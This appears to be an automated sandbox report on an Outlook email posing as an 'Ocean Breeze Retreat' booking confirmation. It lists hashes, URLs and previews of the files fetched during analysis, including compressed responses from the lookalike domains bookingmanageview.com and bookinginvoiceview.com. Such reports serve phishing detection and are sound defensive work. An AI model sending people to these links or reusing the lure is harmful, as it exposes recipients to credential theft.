                                                                                                                          Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (1967)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):144887
                                                                                                                          Entropy (8bit):5.53496954552339
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:6D008330D8EEC16EDFB3FF978426DADB
                                                                                                                          SHA1:E3EAF851BE396B25E5652F7FBE781662E36B738D
                                                                                                                          SHA-256:3C3EC268C6247472DEF435C267DBFAE46E8AA0C644FDDEA520AA6C77C7939C3A
                                                                                                                          SHA-512:077C3975010D353A80E859E67355F449E5B39E89836F95840F1C8E0598B79AEBBFCE5B2FE6F0C4AE916D093580CDC453E9C4673078397D4AE7456A2BA44595D9
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://syndicatedsearch.goog/adsense/domains/caf.js?pac=0
                                                                                                                          Preview:if(!window['googleNDT_']){window['googleNDT_']=(new Date()).getTime();}(function() {window.googleAltLoader=3;var sffeData_={service_host:"syndicatedsearch.goog",hash:"12128785251572431184",packages:"domains",module:"ads",version:"1",m:{cei:"17301437,17301439,17301442,17301548,17301266",ah:true,uatm:500,ecfc2:true,llrm:1000,lldl:"bS5zZWFycy5jb20=",abf:{"_disableAdRequestForNewConsentStrategy":true,"_enableNewConsentStrategy":true,"_fixCtcLinksOnIos":true,"_googEnableQup":true,"_switchGwsRequestToUseAdsenseDomain":true,"_useServerProvidedDomain":true,"_waitOnConsentForFirstPartyCookie":true,"enableEnhancedTargetingRsonc":true,"enableNonblockingSasCookie":true},mdp:1800000,ssdl:"YXBwc3BvdC5jb20sYmxvZ3Nwb3QuY29tLGJyLmNvbSxjby5jb20sY2xvdWRmcm9udC5uZXQsZXUuY29tLGhvcHRvLm9yZyxpbi5uZXQsdHJhbnNsYXRlLmdvb2csdWsuY29tLHVzLmNvbSx3ZWIuYXBw",cdl:false,cdh:"syndicatedsearch.goog",cdem:{"afs_aa_baseline":500,"afs_gpp_api":0,"disable_usp_api":50,"heterodyne_test":851,"ifr_unif":10,"ivt_changes":0,"rs_tc
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (41651)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):131537
                                                                                                                          Entropy (8bit):5.2237799798561975
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:30B7C335C62E5269E2D35B8E8B9F44B4
                                                                                                                          SHA1:C6D92B1516EB8F6D44AAF171FB24A1B2AADD0C4C
                                                                                                                          SHA-256:10733A5D876108F81C5F78EEE5C9760A739D89C52FA6180C4290B7F909F24346
                                                                                                                          SHA-512:5BCE247C84C88F993A857CE2F1E8540C648672DEB6D92A55BC808C33394B784C52866D635BEC8B7CD5E62A7EA4109569AC8BCD1381571B84592ACD6C5901D7A8
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/shell/_scrf/js/themes=default/54-af9f9f/c0-247156/de-099401/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/1b-c96630/db-bc0148/dc-7e9864/78-4c7d22/e1-c35781/40-7b7803/cd-23d3b0/6d-1e7ed0/b7-cadaa7/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/79-499886/7e-cda2d3/db-f3b1fd/93-283c2d/e0-3c9860/91-97a04f/1f-100dea/33-abe4df/19-c0fae7?ver=2.0&iife=1
                                                                                                                          Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):945
                                                                                                                          Entropy (8bit):5.245381851025391
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:57598FD5AD33E49259C0E62B42342246
                                                                                                                          SHA1:7627B00CF6DE90157BE1F8F3CCCEA51937EB2B2D
                                                                                                                          SHA-256:223FFDACF2BC57A6AE1F197B8B17BB6CABBED1A70F9886DAFB78DE3C6D1167DF
                                                                                                                          SHA-512:3DAAA07CC66729AC0FFC32EEA852E49655B4A14709AF67AFC2C019448339CD0F9205918B2A9E904D35AF32BFA86B13B97A60D370759C2DE759ED834066FBD44C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://api.aws.parking.godaddy.com/v1/domains/domain?domain=oceanbreeze.com&portfolioId=&abp=1&gdabp=true
                                                                                                                          Preview:{"system":"SN","account":"D6343586-FD7C-427C-8D3E-A35B29566ED2 ","customerId":"7dbc6047-87b6-4724-9c84-1e076f5b7c3d","displayType":"ADS","dataSource":"INVENTORY","adSense":{"drid":"as-drid-oo-1502969727449347","channel":"00001","pubId":"dp-namemedia01"},"domain":{"rootDomain":"oceanbreeze.com","expiresAt":"","status":{"internal":"ACTIVE"},"isAdult":false,"hasAuction":false},"lander":{"template":"ARROW_3","domainDisplayName":"oceanbreeze.com","headerText":" ","footerText":" ","headerHtml":"","footerHtml":"","banner":{"show":true,"text":"Click here to Buy oceanbreeze.com as your website name or call 1-561-898-0724","link":"http://www.afternic.com/forsale/oceanbreeze.com?utm_source=TDFS\u0026utm_medium=parkedpages\u0026utm_campaign=TDFS_Affiliate_namefind_Narwhal\u0026traffic_type=TDFS\u0026traffic_id=Namefind","type":"AFTERNIC"},"i18n":true,"showDomain":true},"experiment":{"experiment":"","start":"","end":"","enabled":false}}.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):1660
                                                                                                                          Entropy (8bit):4.301517070642596
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                          SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                          SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                          SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (32089)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):92629
                                                                                                                          Entropy (8bit):5.303443527492463
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:397754BA49E9E0CF4E7C190DA78DDA05
                                                                                                                          SHA1:AE49E56999D82802727455F0BA83B63ACD90A22B
                                                                                                                          SHA-256:C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
                                                                                                                          SHA-512:8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                                                                                                                          Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (1979)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):1984
                                                                                                                          Entropy (8bit):5.836450657685294
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:14D2717F55B8EDAE524B5217948D4D37
                                                                                                                          SHA1:E5580443FE0CF4332406078FD68C2300D6039482
                                                                                                                          SHA-256:C2D845B482274BDD874BFF1CA168C296BCA13F902917395C4C5D367AE07C77CA
                                                                                                                          SHA-512:4C3B849F830B6A153C6ECD2038BA732BC87E1B613CFFBAD66A57F81E7E4579C43C0938518EFD571C03D3EF53685FC39FF7D0CC0863BAF5DF28FE69AC0510DDC6
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                                                                          Preview:)]}'.["",["uscis social media visa application","disney+","snow storm weather forecast","mexican chain files chapter 11","pga tour arnold palmer invitational","split fiction games","kevin survivor 48","lottery mega millions powerball jackpot"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"Cg0vZy8xMXd0bTU4N19uEgtPbmxpbmUgZ2FtZTKmBWRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBRUFBQUFBTkNBTUFBQUF1Y1poZUFBQUFVVkJNVkVYLy8vOEF0dHdBdGRzQXQ5d0F1dDRBdWQzUDdmWS93K0kxd2VIbjl2clo4UGduditEZzgvbDIwT2hleXVYdytmeXU0ZkJOeHVPKzUvT1YyZXlNMXV2My9QMjI1UExHNnZSLzArbHB6ZWFtMys4VFZERkZBQUFCVkVsRVFWUW9rWDNUMlhhRUlBd0EwR3hzQnNlNm9IYisvME1ic0hiMnZuZ0l3aFZpQXAyS1RLQWhCSjkxQkFCVmIxRU1OdXhqQ0pwc2RoR0phYW5STm1yT3RtV0dVV0hSYm9Nb0tBUnNUOHlvdG92WUV3czdHMTRjRTJXTW1TeSs3T1NFMW9ncENBdWxnTjFPSGtB
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):563851
                                                                                                                          Entropy (8bit):5.221453271093944
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:12DD1E4D0485A80184B36D158018DE81
                                                                                                                          SHA1:EB2594062E90E3DCD5127679F9C369D3BF39D61C
                                                                                                                          SHA-256:A04B5B8B345E79987621008E6CC9BEF2B684663F9A820A0C7460E727A2A4DDC3
                                                                                                                          SHA-512:F3A92BF0C681E6D2198970F43B966ABDF8CCBFF3F9BD5136A1CA911747369C49F8C36C69A7E98E0F2AED3163D9D1C5D44EFCE67A178DE479196845721219E12C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css
                                                                                                                          Preview:@charset "UTF-8";/*! @ms-mwf/mwf - v1.25.0+6321934 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css *
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):5162
                                                                                                                          Entropy (8bit):5.349865760247148
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:70A8F21806E7F1B739937970EBE49A0C
                                                                                                                          SHA1:6BE9EEBCE438DE91FEB20E6A5458774B327AA9B4
                                                                                                                          SHA-256:C8B531CFD6E9BE13762E289820F67406331303CD5111A885DE959BF83DD0F5AC
                                                                                                                          SHA-512:3C055567D0ED53BD30773C0BE475DC7499E44AFB92FB05021029D9A0C1299A470CDD3A8CACCCF798D5345ED627C5836E9DF5955A120FE56BA3624EC76A673270
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.L8bgMGq1rcI.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTuS2lB4IRlJuMaoM0QgSoTOihj9Bg"
                                                                                                                          Preview:.gb_Q{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ka{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_La{fill:#f9ab00}.gb_H .gb_La{fill:#fdd663}.gb_Ma>.gb_La{fill:#d93025}.gb_H .gb_Ma>.gb_La{fill:#f28b82}.gb_Ma>.gb_Na{fill:white}.gb_Na,.gb_H .gb_Ma>.gb_Na{fill:#202124}.gb_Oa{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (384), with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):384
                                                                                                                          Entropy (8bit):5.471730780745167
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:BC590DBC9A19941C44F2437EFE954ACC
                                                                                                                          SHA1:1A31B3DE48B09AF7D51AF9D369841601902F7F0E
                                                                                                                          SHA-256:0E0F1F2F02002201D917B65025C03C612FF8CB626F9FD2AC6E78FC285D8A08EC
                                                                                                                          SHA-512:52C1F11C27EB9FAD4E91E11C1BBD00E978216E7671D4D399281F839544F79E4683E88512326CA16148883EAE9305FE1BE7A27203495076076B0B489C25BEBFC4
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://partner.googleadservices.com/gampad/cookie.js?domain=oceanbreeze.com&client=dp-namemedia01&product=SAS&callback=__sasCookie&cookie_types=v1%2Cv2
                                                                                                                          Preview:__sasCookie({"_cookies_":[{"_value_":"ID=0d54330c01ce704f:T=1741386834:RT=1741386834:S=ALNI_MZlEZO3Gas6spuiH2r9-oSEn0MtQw","_expires_":1775082834,"_path_":"/","_domain_":"oceanbreeze.com","_version_":1},{"_value_":"UID=0000105732a04b29:T=1741386834:RT=1741386834:S=ALNI_MaunqWfJBzz1QCyQimH2dPGL2uErw","_expires_":1775082834,"_path_":"/","_domain_":"oceanbreeze.com","_version_":2}]});
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):2956
                                                                                                                          Entropy (8bit):7.9246686840884815
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:10B942DDCB35BC63D8055636B4201CE3
                                                                                                                          SHA1:F9B17FFAF800855F6E34E1E10421A08EB5777E29
                                                                                                                          SHA-256:D6FD69649D7069CC994E17CDB456024D72DF4A51F6402B60A534F7C1CA38591C
                                                                                                                          SHA-512:080DA6C67A3E807189B7F729E6E978F57A7AFE708D2E1FA994C50EAC8DE458238122AE9CD3E338A9D5212043F4BAC3667E7604AC900C9F6878255EEDD5F716B0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://bookingmanageview.com/lnvoice/B-37288321/
                                                                                                                          Preview:(./..X.[.z...1......"...Q...n..!..7K'...+L..7.S+....fd...1E.........A..2..z..B...2...;...s*..c.....^9,..."A.../.m..p.`8 ..P..F.qQa.(......6.x.../..v.s..#.c.....x.....Z.R`...%...R...*Zr.{.C.bOp.[zp....4.......5.-.3.e..~.jLz..b.zx..d.O.G:.E.. A.A...=d.A..".VW.>?.#.L...|FPf.2.@KS2|.q.1.e..l.].)i..wJb@'.P..Z.S..z.P.yw0[..7.U..L>.lS.Hl-......x..z..V.T.......K..~..+-#.VL.}.#R..m.....[..n]a7]...L...7m^z.pW........F...<.^M....."H0q...f..>}._...&..K.X,..Q..@.."..3...SUu.%I..F.}.BW...o...lm]U+_..b...$J&..$..7....[{.(\.F'...(@2..h..>\TP._....=p./..9.8.r2)...Ao.Sf.aA..CG'm....a@.C.g.x.k..N...;.m.......x.U..=x0(pY.Z....?@.h<.....>..n...B.n...S........I-..m..j.S...p.6.|x.-..^a...I...'./..~{...g....4.....@."m<..,...C8...(m....+..C..I...pt......SO..?.O.s...f..I]GN...<d....e...e.N..9f.=1.na.k6..t)...o._...b......c....d..u..}J.t2)O.q.| _....,4(($.;`.Co....8.l.s....)..(.A!........{N)...~.'.83....X...O....P....2[.)...S!.~.B...D..B.P-P.C!...?......+.sj".$.!_...9.1..g
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):167730
                                                                                                                          Entropy (8bit):5.045981547409661
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:AFB5C64B13342F6E568093548D0A2A9F
                                                                                                                          SHA1:95FC121CCCFDBA12443CF87A9C823486065A14AB
                                                                                                                          SHA-256:238DB52476BF8107E2E851CD3299B071ED5944B570C1603A1EA758A4FADF5F29
                                                                                                                          SHA-512:6FE8BADD1B94E81464C0808383A4CC77F779BF226A3C13B58B2BCB36332995EFBC7711373EE8AB2A8BC52675884F9885D168CB2DE9535E39E71B0B72940691E1
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/2b-7ae144/7e-3283eb/69-8122fc/86-016699/72-2b1d8c/80-6461e7/2a-d9be59/51-40faf7?ver=2.0
                                                                                                                          Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):19
                                                                                                                          Entropy (8bit):3.6818808028034042
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:9FAE2B6737B98261777262B14B586F28
                                                                                                                          SHA1:79C894898B2CED39335EB0003C18B27AA8C6DDCD
                                                                                                                          SHA-256:F55F6B26E77DF6647E544AE5B45892DCEA380B7A6D2BFAA1E023EA112CE81E73
                                                                                                                          SHA-512:29CB8E5462B15488B0C6D5FC1673E273FB47841E9C76A4AA5415CA93CEA31B87052BBA511680F2BC9E6543A29F1BBFBA9D06FCC08F5C65BEB115EE7A9E5EFF36
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://www.google.com/async/ddljson?async=ntp:2
                                                                                                                          Preview:)]}'.{"ddljson":{}}
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):546
                                                                                                                          Entropy (8bit):7.5392268962803115
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:02C3F7E389BD989273538638C0A4FF35
                                                                                                                          SHA1:7A80D4BF6447F3C7FCFA189312E3953B95EBE0BB
                                                                                                                          SHA-256:CC7F0FFDF0D7166E927D7DB34332FD76C8EAC9F4AD51104A52D89AB5AE06AAF5
                                                                                                                          SHA-512:1956BF79DC824D8E8C14224CCA2B32F01E43B15461D7BE5A063C26F7AA22B21B65C19C8F84C08DD3A1457B78D7C306CCF360D370AA117B69966EC2634939772B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          URL:https://bookinginvoiceview.com/
                                                                                                                          Preview:(./..X.....g$.s..............x`".Wb.Q`.0......."].c.[.,#..)l...&..1>>..S....6.".....d.....!5....q.....pSxZ.j..3r..j.S..p....p.2.w.a.....2....xr.r)....<B.=Hk..c..Oo.-C..\.9H..... 4..9*...d.'.[x.....$pd#Q!..[..W..k.P.......Q@.......1......Hg..K.g.g..r.h....uZ.K.W.cW.}..SS3..R.-qFM..r1z ...eS.....0.p,.S.q...N,..yzX.h..rb.pjEg.k....x`.qQ..uq..'_.V...X.......(;.m.w.D.Mj....5.../,q...6y..5.-qF.16..[v.)>., 0B..^..+TB...pv...nz.M.&1..o...m.L.g...!pcYQ..h7.`D....3.&.....ZX...p.Y.ha..../.4.Z...5.WY#l..eQp\M.s.\..&[g.y..
                                                                                                                          File type:CDFV2 Microsoft Outlook Message
                                                                                                                          Entropy (8bit):4.163055452994072
                                                                                                                          TrID:
                                                                                                                          • Outlook Message (71009/1) 45.36%
                                                                                                                          • Outlook Form Template (41509/1) 26.51%
                                                                                                                          • ClickyMouse macro set (36024/1) 23.01%
                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 5.12%
                                                                                                                          File name:Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msg
                                                                                                                          File size:118'272 bytes
                                                                                                                          MD5:3a01d6a3cf44ee40632cdb0b40c36624
                                                                                                                          SHA1:13993d0144d3136e7ad9082e65450db0e1c12f03
                                                                                                                          SHA256:3bbc9f13f9ed9195ed633f8fa78be3ccc3336934ba79954a31cca0daba6b4158
                                                                                                                          SHA512:81637c438ced5db603516945f11a65f2110cc50ca576c55653305eaa88e44b644a9cb8b3017067e3a12d99b419c1312c2f60bf84c12d1ccbfdc688525f5523a0
                                                                                                                          SSDEEP:1536:W6AxLqUpp9taQkhMLslOgRnrlWZZWCtI/oW+7D1:ZjUppbrkhMLslOgRnrMtI4H1
                                                                                                                          TLSH:8CC312283AE60119F377DF358BF2509B8926FD536D149A5F2195330D0A72A41ACA2F3F
                                                                                                                          File Content Preview:........................>.......................................................|..............................................................................................................................................................................
                                                                                                                          Subject:Dear, david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat
                                                                                                                          From:"Ocean Breeze" <support@w-d7f249u2qdtv96vtgmgtwp7r8y22vk78h3ic66fai8z8a57es.hn-3cawemao.na231.case.salesforce.com>
                                                                                                                          To:<david@corerecon.com>
                                                                                                                          Cc:
                                                                                                                          BCC:
